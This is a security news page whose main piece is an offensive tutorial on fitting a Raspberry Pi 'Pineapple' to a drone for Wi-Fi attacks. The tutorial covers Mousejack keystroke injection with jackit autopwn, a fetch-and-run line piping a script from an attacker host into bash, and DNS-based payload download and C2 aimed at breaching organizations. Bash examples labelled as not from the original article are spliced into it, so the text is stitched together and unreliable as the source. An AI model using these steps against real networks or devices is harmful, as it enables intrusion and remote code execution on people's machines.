Today, 26 January 2026: Hacking and InfoSec

Indian Users Targeted in Tax Phishing Campaign Delivering Blackmoon Malware

Cybersecurity researchers have discovered an ongoing campaign that's targeting Indian users with a multi-stage backdoor as part of a suspected cyber espionage campaign. The activity, per the eSentire Threat Response Unit (TRU), involves using phishing emails impersonating the Income Tax Department of India to trick victims into downloading a malicious archive, ultimately granting the threat

Drone Hacking: Build Your Own Hacking Drone, Part 3

26 January 2026 at 10:29

Welcome back, aspiring drone cyberwarriors!

We continue our series of articles on Drone Hacking. In previous parts, we discussed drones as platforms and delivery mechanisms. Now it is time to take a closer look at the attacking component itself. This is where many people misunderstand the threat. For a hacker, a drone is not a weapon. A drone is merely transportation. It is the deliverer, not the attacker. In reality, almost all wireless attacks are carried out using a small device attached to the drone. This device performs the scanning, interception, impersonation, and exploitation of wireless protocols. One such device is a Pineapple built on a Raspberry Pi, which we will show you how to build today. Its compact size allows it to be mounted on almost any drone, because it is lightweight and consumes little power. In fact, this same device does not even require a drone at all. It can be used independently. A hacker can quietly plant such a device near a target building, drop it into grass or bushes near an office, or hide it in everyday infrastructure. OTW has already explained how it was done in Mr. Robot.

Many readers will remember the scene from the TV series where a Raspberry Pi is hidden inside a thermostat. That scene is not science fiction. It is a very realistic example of how such hardware can be deployed. In a separate article we will show you how our device operates when used independently without a drone.

[Image: Mr. Robot scene with a thermostat and a Raspberry Pi]

Raspberry Pi Pineapple

Now, let’s talk about our new device. The total weight of the homemade Pineapple together with its battery ranges from only 17 to 43 grams, depending on the battery used. Modern consumer drones are designed with power reserves to compensate for wind and to carry accessories such as action cameras. As a result, they can typically lift between one-third and one-half of their own weight without a noticeable loss of flight performance.

[Image: a Raspberry Pi with a battery]

This means that almost any drone, including very small selfie drones, can easily handle such a payload. This is a significant advantage compared to the bulky, ready-made Pineapple device from Hak5. Not every drone can lift that commercial unit. From an attacker’s perspective, speed is often the most important requirement when planning drone-based attacks. Fast deployment, short exposure time, and rapid exit are key.

In a separate article dedicated specifically to the Pineapple platform, we will examine static attacks on wireless networks. These are attacks where long-term presence at a fixed point is required. When a drone is involved, however, it makes far more sense to perform dynamic attacks. Wireless attacks are highly dependent on circumstances, such as whether client devices are present and active at a given moment. Because of this, the duration of exposure directly affects the probability of success. From a practical standpoint, the choice is obvious. If the device is lost, the hacker simply purchases another Raspberry Pi and flashes a prepared image onto a memory card. There is no need to buy a costly ready-made solution and wait for delivery.

The Raspberry Pi, like most other single-board computers, can operate at reduced voltage, which makes it possible to use popular compact 3.7 V batteries. Such batteries are cheaper and smaller than power banks and can be easily purchased online. They are charged with 5 V, which can be taken from any USB port. However, despite the fact that the Raspberry Pi can operate at 3.3 V, external USB devices do not receive the 5 V promised by the USB standard in this case. Therefore, if such external USB devices are planned to be used, the voltage must still be raised to 5 V using the popular DC-DC MT3608 module (the blue module on top).

[Image: a Raspberry Pi Pineapple ready for the drone]

A 3.7 V battery, located at the bottom, supplies 5 V to GPIO pins 2 and 9 through the MT3608 DC-DC boost converter. An external Micro-USB connector is also soldered to the converter for convenient battery charging, along with a power toggle switch for battery supply. Nevertheless, the Raspberry Pi has two native USB ports, which means there is always the option to use a regular power bank. The wiring diagram for LEDs, switches, and power connections is shown below.

[Image: Raspberry Pi pinout with LEDs, jumpers, and power connections]

Using a display can be wasteful in terms of battery consumption, so it is better to use three LEDs to indicate the process. To automatically start predefined scenarios, six jumper positions are used. Their software handling is described below. Two voltage supply points are also provided: 5 volts and 3.3 volts. Pins 8 and 10 serve an additional purpose. Using a UART adapter, an operator can always open a shell on the Pineapple device for debugging or control.

Now we arrive at one of the most important components. It’s the Wi-Fi adapter. Monitor mode is not available out of the box on the Raspberry Pi’s built-in Wi-Fi card. It can be enabled using special firmware, but this requires building and installing a new kernel.

Pi > wget -O re4son-kernel_current.tar.xz https://re4son-kernel.com/download/re4son-kernel-current/
Pi > tar -xJf re4son-kernel_current.tar.xz
Pi > cd re4son-kernel_4*
Pi > sudo ./install.sh

After installation, an additional firmware file for the Wi-Fi chip appears. This file enables monitor mode functionality.

Pi > md5sum /lib/firmware/brcm/brcmfmac43430-sdio.*

bae7f1ba1b64cb19bb0c5433a3940405 /lib/firmware/brcm/brcmfmac43430-sdio.bin.monitor
54f6af2776997cb1ee06edf2b93ab815 /lib/firmware/brcm/brcmfmac43430-sdio.bin.original

To switch between firmware versions, the driver can be reloaded and the firmware file renamed. With the monitor-capable firmware loaded, a monitor interface is created on the built-in radio and used as follows:

Pi > iw phy0 interface add mon0 type monitor
Pi > ifconfig mon0 up
Pi > airodump-ng mon0

At this point, the device can autonomously perform many of the most common Wi-Fi attacks. If necessary, external Wi-Fi adapters and directional antennas can be used, although this reduces stealth and increases detectability.

Because this configuration may shut down improperly when the battery is depleted, it is recommended to disable disk caching to prevent data loss.

/etc/fstab
PARTUUID=067e19d7-02 / ext4 defaults,noatime,sync 0 1

In some scenarios, the hacker needs attacks to start immediately upon power-up. This is achieved using GPIO jumpers. Jumper positions are read in software using the following script.

/etc/local/bin/jmp

#!/bin/bash
# Return the level (0 or 1) of the GPIO pin given as $1 as the exit status.
# raspi-gpio prints a line such as "GPIO 17: level=1 fsel=0 func=INPUT pull=UP";
# the third field is "level=N", and the value after "=" is the jumper state.
exit "$(raspi-gpio get "$1" | awk '{print $3}' | cut -d '=' -f 2)"

By setting a jumper position before powering on the device, the hacker selects which attack scenario to launch, such as an Evil Twin or mass deauthentication and handshake capture. The logic for this selection is implemented in the startup script.
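As an added example (not code from the article or its GitHub script), the bash helpers below decode the level of one pin from the text that raspi-gpio prints and fold several jumper pins into a single scenario number, which is the decision the startup script has to make from six jumpers. The pin numbers and the sample raspi-gpio output lines are constructed assumptions; on a machine without raspi-gpio the reader falls back to the constructed line so the script runs anywhere.

```shell
#!/bin/bash
# Added example, not from the original article: decode jumper levels from
# raspi-gpio output and combine them into one scenario number.

# Parse a line such as "GPIO 17: level=1 fsel=0 func=INPUT pull=UP"
# (constructed sample format) and print the numeric level (0 or 1).
# Returns 1 if no level field is present, so callers can detect bad input.
gpio_level_from_line() {
    local line="$1" level
    level=$(printf '%s\n' "$line" | sed -n 's/.*level=\([01]\).*/\1/p')
    [ -n "$level" ] || return 1
    printf '%s\n' "$level"
}

# Combine jumper levels, most significant first, into one integer:
# six jumpers give a scenario number from 0 to 63.
jumpers_to_scenario() {
    local n=0 lvl
    for lvl in "$@"; do
        n=$(( (n << 1) | lvl ))
    done
    printf '%s\n' "$n"
}

# Read a real pin when raspi-gpio exists (on the Pi); otherwise use a
# constructed line with level=0 so the example runs on any machine.
read_jumper() {
    local pin="$1"
    if command -v raspi-gpio >/dev/null 2>&1; then
        gpio_level_from_line "$(raspi-gpio get "$pin")"
    else
        gpio_level_from_line "GPIO $pin: level=0 fsel=0 func=INPUT pull=UP"
    fi
}

# Read a list of jumper pins (assumed BCM numbers, most significant first)
# and print the resulting scenario number.
read_scenario() {
    local levels="" pin
    for pin in "$@"; do
        levels="$levels $(read_jumper "$pin")"
    done
    # shellcheck disable=SC2086  # word splitting of the level list is intended
    jumpers_to_scenario $levels
}

# Usage: read_scenario 17 27 22 5 6 13
```

Returning the level on stdout rather than as an exit status keeps the helper composable; the original jmp script's exit-status convention works too, but an exit status cannot distinguish "pin is low" from "command failed", which matters when the device boots unattended.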

A startup.sh file is created in /home/pi.

[Image: the startup script for wireless attacks with a drone]

You can find this script on our GitHub.

Then you need to add the following entry to /etc/rc.local:

/bin/bash /home/pi/startup.sh &

This will launch the script automatically. Attack progress and results are stored on the device's memory card. Filenames reflect the attack type, date, and time. With the platform established, we now move on to the first of the most critical attacks that can be carried out using a drone.

Mousejack

There is a widespread vulnerability that has persisted for decades in hundreds of thousands of wireless mice and keyboards. It gives you a remote code execution in one to two seconds. Quite a cinematic scene. This vulnerability is known as Mousejack. An attack on wireless HID devices is perhaps the most visually striking and dangerous attack possible. With minimal effort and no user interaction, a hacker can remotely send arbitrary keystrokes. This means arbitrary code execution. No password guessing. No social engineering. Instant RCE. Below is the part of our startup.sh code that starts this attack.

[Image: the snippet of the startup script responsible for starting the Mousejack attack]

The attack is performed using a CrazyRadio PA device in combination with a single-board computer such as a Raspberry Pi or a Pineapple. If the CrazyRadio PA dongle is inserted into the Pineapple, the attack can be launched automatically at startup, once you add mousejack.sh to the mousejack directory. We have it here. You will also need to install jackit, which you can find here.

[Image: the mousejack.sh script called by the startup script]

Because we don't know the addresses of target devices, we attack everything detected in the radio spectrum. This is why the --autopwn flag is used. Combined with a Pineapple, CrazyRadio becomes an extremely dangerous tool.

[Image: a drone with a CrazyRadio PA plugged in]

A drone carrying such a device can breach the perimeter of almost any organization. While flying, it attacks all vulnerable devices within range. Mousejack exploitation is similar to BadUSB-HID attacks. Here we encounter the same problems when typing commands: when using keystrokes, we have to guess the keyboard layout. Also, when using ALT codes to type commands (possible only on Windows), we have to guess the state of the Num Lock key. In both cases, to be reliable, we have to send the keystrokes twice, changing either the layout or the Num Lock state. But in the case of ALT codes, three to four times more keystrokes are required. And if there is no difference in outcome, why transmit more? It is more rational here to use the simple method of sending direct key presses rather than their codes. That's why ducky.txt is used.

[Image: the ducky.txt script for switching Windows keyboard layouts]

Find it and place it in /home/pi/mousejack/. Depending on your language preferences, you might need to modify the file.

Longer commands increase the chance of interference. A single dropped keystroke can break the exploit. On Unix-like systems, hackers often rely on short commands such as:

curl -L http://rce.attacker.tk/1.sh | bash

At this stage, success depends only on drone positioning and the presence of wireless mice within a radius of approximately 10-15 meters. This attack looks exactly like it does in movies. Imagine working in a secure building, far from checkpoints, when a drone briefly appears outside a window. In a single second, malicious code is executed on your computer. You may never associate that moment with the compromise.

[Image: a Mousejack attack with a drone]

Wireless mice and keyboards are especially common among IT staff and executives, making such attacks disproportionately valuable. Once a single internal machine is compromised, the perimeter is breached.

Even when direct internet access is blocked, DNS-based exfiltration often remains possible. DNS can be used to download payloads and maintain command-and-control channels. Implementing the download of a malicious program over DNS can be done using basic tools of any operating system. For example, on Windows, the most portable method is a VBS script written in a full-fledged interpreted programming language. However, the length of the command entered into the "Run" window is limited, and to type a VBS script that downloads a remote administration tool over DNS, the hacker will need at least three commands. For this you will need a file that you can find here.

[Image: DNS-based C2 communication to bypass firewalls]

When these commands are executed, three DNS callbacks should arrive at the hacker’s server, indicating that the commands were entered successfully.
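The channel described above leaves a recognizable trace on the resolver side: data carried in query names shows up as long or hex-looking labels and as bursts of lookups toward one registered domain. As an added example (not part of the article), the bash script below runs that detection logic over a few constructed resolver log lines; the log format, hostnames and thresholds are all assumptions to be tuned for a real environment.

```shell
#!/bin/bash
# Added example, not from the original article: flag DNS query names that
# look like data being carried in labels, then count hits per domain.

# Constructed sample resolver log: "<epoch> <client> <qname>".
# The tunnel-example.test lines mimic hex-encoded chunks in the first label.
SAMPLE_LOG='1700000000 10.0.0.12 www.example.com
1700000001 10.0.0.12 mail.example.com
1700000002 10.0.0.12 4a6f686e20446f652c20303120323032.p1.tunnel-example.test
1700000003 10.0.0.12 5468697320697320612074657374206d65737361.p2.tunnel-example.test
1700000004 10.0.0.12 2c20646f206e6f7420746f7563682e0a00000000.p3.tunnel-example.test
1700000005 10.0.0.13 cdn.example.org'

# Read log lines on stdin and print "<qname> <reason>" for each query that
# trips a rule:
#   long-label : a single label longer than MAX_LABEL characters
#   hex-label  : a label of at least MIN_HEX characters made only of hex digits
# Both thresholds are assumptions (defaults 40 and 24).
flag_dns_queries() {
    local max_label="${1:-40}" min_hex="${2:-24}"
    awk -v maxl="$max_label" -v minhex="$min_hex" '
    {
        qname = $3
        n = split(qname, labels, ".")
        reason = ""
        for (i = 1; i <= n; i++) {
            if (length(labels[i]) > maxl) { reason = "long-label"; break }
            if (length(labels[i]) >= minhex && labels[i] ~ /^[0-9a-f]+$/) {
                reason = "hex-label"; break
            }
        }
        if (reason != "") print qname, reason
    }'
}

# Read flagged "<qname> <reason>" lines on stdin and print "<domain> <count>"
# per registered domain (approximated as the last two labels), so a burst of
# lookups toward one domain stands out even if each query looks ordinary.
count_by_domain() {
    awk '{
        n = split($1, labels, ".")
        dom = labels[n-1] "." labels[n]
        count[dom]++
    }
    END { for (d in count) print d, count[d] }' | sort
}

# Usage on the constructed sample (real use: pipe resolver logs instead):
printf '%s\n' "$SAMPLE_LOG" | flag_dns_queries | count_by_domain
```

The two-label approximation of a registered domain is deliberately simple; a production detector would use a public-suffix list and would also look at query volume per client and the ratio of unique subdomains, since a channel can keep labels short and spread data over many queries.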

Summary

This is only our first example that demonstrates how easily organizations can be compromised if you find the right computer. If you plan to use it, do it responsibly. Despite being known since 2016, Mousejack remains widespread and underestimated. Because it is a hardware flaw, it persists for years. People replace phones frequently, but they rarely replace their mice.

In Part 4 you will see more of these attacks and the needed scripts for them.

For those of you getting started with Software-Defined Radio (SDR) or looking to advance your SDR hacking skills, we offer a structured training program that guides you from the fundamentals of SDR all the way to advanced, real-world applications in cybersecurity and signals intelligence.

Malicious VS Code AI Extensions with 1.5 Million Installs Steal Developer Source Code

Cybersecurity researchers have discovered two malicious Microsoft Visual Studio Code (VS Code) extensions that are advertised as artificial intelligence (AI)-powered coding assistants, but also harbor covert functionality to siphon developer data to China-based servers. The extensions, which have 1.5 million combined installs and are still available for download from the official Visual Studio

Lazarus Hackers Target European Drone Manufacturers in Active Campaign

26 January 2026 at 07:55

The North Korean state-sponsored Lazarus hacking group has launched a sophisticated cyberespionage campaign targeting European defense contractors involved in uncrewed aerial vehicle (UAV) manufacturing. The attacks appear directly linked to North Korea’s efforts to accelerate its domestic drone production capabilities through industrial espionage. The targeted organizations include a metal engineering firm, an aircraft component manufacturer, […]

The post Lazarus Hackers Target European Drone Manufacturers in Active Campaign appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

PoC Released for GNU InetUtils telnetd RCE as 800K+ Exposed Instances Remain Online

By: Divya
26 January 2026 at 07:40

A proof-of-concept exploit for CVE-2026-24061, a critical remote code execution vulnerability in the GNU Inetutils telnetd, has surfaced, with security researchers warning that over 800,000 vulnerable instances remain publicly accessible on the internet. The vulnerability allows unauthenticated attackers to execute arbitrary commands on affected systems running vulnerable versions of the telnetd service. Vulnerability Overview CVE-2026-24061 […]

Instagram Investigates Reported Vulnerability Allowing Access to Private Content

By: Divya
26 January 2026 at 07:40

A server-side vulnerability in Instagram allegedly allowed completely unauthenticated access to private account posts. This raises concerns about Meta's vulnerability disclosure handling and the effectiveness of compensatory controls protecting user privacy. Technical Overview According to the disclosure, the vulnerability existed in Instagram's mobile web interface and required no authentication or follower relationship to exploit. […]

New Malware Toolkit Redirects Victims to Malicious Sites Without Changing the URL

26 January 2026 at 07:00

A dangerous new malware toolkit is being sold on Russian cybercrime forums that can redirect victims to fake websites while keeping the real domain name visible in their browser’s address bar. The toolkit, called Stanley, costs between $2,000 and $6,000 and comes with a guarantee that it will pass Google’s Chrome Web Store review process. […]

New DPRK Interview Campaign Uses Fake Fonts to Deliver Malware

26 January 2026 at 06:11

A dangerous new iteration of the "Contagious Interview" campaign weaponizes Microsoft Visual Studio Code task files to distribute sophisticated malware targeting software developers. This campaign, which began over 100 days ago, has intensified dramatically in recent weeks with 17 malicious GitHub repositories identified across 11 distinct attack variants. North Korean threat actors linked to […]

NetSupport Manager 0-Day Vulnerabilities Enable Remote Code Execution

26 January 2026 at 05:31

Two critical 0-day vulnerabilities in NetSupport Manager, when chained, allow unauthenticated remote code execution (RCE). The vulnerabilities were discovered during routine security assessments of operational technology (OT) environments and affect version 14.10.4.0 and earlier, with fixes implemented in version 14.12.0000 released on July 29th, 2025. The two vulnerabilities tracked as CVE-2025-34164 and CVE-2025-34165 reside […]

Microsoft Issues KB5078127 OOB Patch After Reports of Outlook Freezing and File System Instability

By: Divya
26 January 2026 at 05:07

Microsoft has released two critical out-of-band (OOB) security patches targeting widespread issues affecting Windows 11 users following January’s monthly security updates. The emergency patches, KB5078127 and KB5078132, address severe file system failures and application crashes that emerged after the January 13 security release. The primary culprit behind these issues is unexpected complications introduced by KB5073455 […]

SyncFuture Campaign Abuses Enterprise Security Tools to Deploy Malware

26 January 2026 at 03:47

A sophisticated, multi-stage espionage campaign is targeting Indian residents through phishing emails impersonating the Income Tax Department. The attack chain, tracked as the "SyncFuture Espionage Campaign," weaponizes legitimate enterprise security software as its final payload, demonstrating how threat actors repurpose trusted commercial tools to establish persistent, undetectable access to victim systems. The campaign begins with targeted […]

Apache Hadoop Flaw Could Trigger System Crashes or Data Corruption

By: Divya
26 January 2026 at 03:10

A moderate out-of-bounds write vulnerability in Apache Hadoop's HDFS native client could allow attackers to trigger system crashes or cause data corruption in production environments. The flaw, identified as CVE-2025-27821, affects the native HDFS client's URI parser and has been assigned moderate severity by Apache. The vulnerability was discovered and reported by security researcher […]

New Phishing Attack Exploits Vercel to Host and Deliver Remote Access Malware

26 January 2026 at 02:39

A new phishing campaign abusing the Vercel hosting platform has been active since at least November 2025 and is becoming increasingly sophisticated. The core trick is "inherited trust." Attackers send short phishing emails with financial or business themes such as unpaid invoices, payment statements, or document reviews. The real hook is not the text, but […]

Beginners Guide to Bulk Extractor tool

26 January 2026 at 06:30

Hello aspiring Cyber Forensic Investigators. In our previous blogpost, you learnt in detail about Computer Forensics. In this article, you will learn about Bulk Extractor, a fast, automated forensic carving tool. Digital forensic investigations often require extracting useful information from massive amounts of data like disk images, memory dumps, captured network traffic and more. Manually […]

The post Beginners Guide to Bulk Extractor tool appeared first on Hackercool Magazine.

⚡ Weekly Recap: Firewall Flaws, AI-Built Malware, Browser Traps, Critical CVEs & More

Security failures rarely arrive loudly. They slip in through trusted tools, half-fixed problems, and habits people stop questioning. This week's recap shows that pattern clearly. Attackers are moving faster than defenses, mixing old tricks with new paths. "Patched" no longer means safe, and every day, software keeps becoming the entry point. What follows is a set of small but telling signals.

Winning Against AI-Based Attacks Requires a Combined Defensive Approach

If there’s a constant in cybersecurity, it’s that adversaries are always innovating. The rise of offensive AI is transforming attack strategies and making them harder to detect. Google’s Threat Intelligence Group, recently reported on adversaries using Large Language Models (LLMs) to both conceal code and generate malicious scripts on the fly, letting malware shape-shift in real-time to evade

Linux Inside a PDF

By: Author
26 January 2026 at 04:30

Linux running inside a PDF. An actual working operating system with a terminal where you can type commands. Open a PDF in Chrome. Wait 30 seconds. You now have a working Linux terminal. No installation, no software, just a 6MB file that boots an entire operating system.

A high school student named Allen built this, the same kid who previously crammed Doom into a PDF. Before that he made tools to bypass school software restrictions and exploits to boot Linux on locked-down Chromebooks.